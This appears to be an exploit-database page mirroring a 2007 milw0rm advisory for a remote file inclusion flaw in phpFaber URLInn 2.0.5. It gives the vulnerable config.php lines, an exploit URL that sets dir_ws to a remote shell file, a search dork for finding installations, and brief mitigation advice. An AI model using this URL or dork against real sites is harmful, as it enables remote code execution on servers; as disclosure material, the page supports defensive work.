header-logo
Suggest Exploit
vendor:
phpFaber.URLInn.v2.0.5.PHP.NULL-DGT
by:
7.5
CVSS
HIGH
Remote File Inclusion
CWE
Product Name: phpFaber.URLInn.v2.0.5.PHP.NULL-DGT
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

Remote File Inclusion in phpFaber.URLInn.v2.0.5.PHP.NULL-DGT

This vulnerability allows an attacker to include remote files in the vulnerable file /phpFaber.URLInn.v2.0.5.PHP.NULL-DGT/phpfaber_urlinn_2_0_5/urlinn_includes/config.php. The exploit URL is http://localhost/path/urlinn_includes/config.php?dir_ws=http://localhost/shell.txt?. The vulnerability occurs due to the presence of the vulnerable variable dir_ws in the code at line number 78.

Mitigation:

To mitigate this vulnerability, it is recommended to properly sanitize and validate user input before using it in file inclusion operations. Additionally, disabling the register_globals feature and keeping software up to date can help prevent such vulnerabilities.
Source

Exploit-DB raw data:

                                  /   \      
 _                        )      ((   ))     (
(@)                      /|\      ))_((     /|\
|-|                     / | \    (/\|/\)   / | \                      (@)
| |--------------------/--|-voV---\`|'/--Vov-|--\---------------------|-|
|-|                         '^`   (o o)  '^`                          | |
| |                               `\Y/'                               |-|
|-|                                                                   | |
| |                          -=ShAd0w-CrEw=-                          |-|
|-|                                                                   | |
| |                                                                   |-|
|_|___________________________________________________________________| |
(@)              l   /\ /         ( (       \ /\   l                  |-|
                 l /   V           \ \       V   \ l                  (@)
                 l/                _) )_          \I
                                   `\ /'
                     ` 
            ----------------------------------------------
              GrEeTs To -=sHaDoW sEcUrItY TeAm=- GrEeTs To
            ----------------------------------------------
              A2J, iNs, The Pitbull, ICQBomber, str0ke
            ----------------------------------------------
                     BiG sHoUt OuT tO udplink.net
            ----------------------------------------------




Vulnerability Type: Remote File Inclusion
Vulnerable file: /phpFaber.URLInn.v2.0.5.PHP.NULL-DGT/phpfaber_urlinn_2_0_5/urlinn_includes/config.php
Exploit URL: http://localhost/path/urlinn_includes/config.php?dir_ws=http://localhost/shell.txt?
Method: get
Register_globals: On
Vulnerable variable: dir_ws
Line number: 78
Lines:

----------------------------------------------
require_once("$dir_ws/urlinn_includes/adodb/adodb.inc.php");
require_once("$dir_ws/urlinn_includes/smarty/Smarty.class.php");
require_once("$dir_ws/urlinn_includes/i_PageSelector.php");

----------------------------------------------


               ----------------------------------------------
                        FoUnD By BiNgZa AKA RaZor
               ----------------------------------------------
               DoRk:Powered by phpFaber URLInn. Copyright © 2004-2006 phpFaber
               ----------------------------------------------
                        shadowcrew@hotmail.co.uk
               ----------------------------------------------
                          shadow.php0h.com
               ----------------------------------------------

# milw0rm.com [2007-10-30]

Navigation

Suggest Exploit

Services By CQR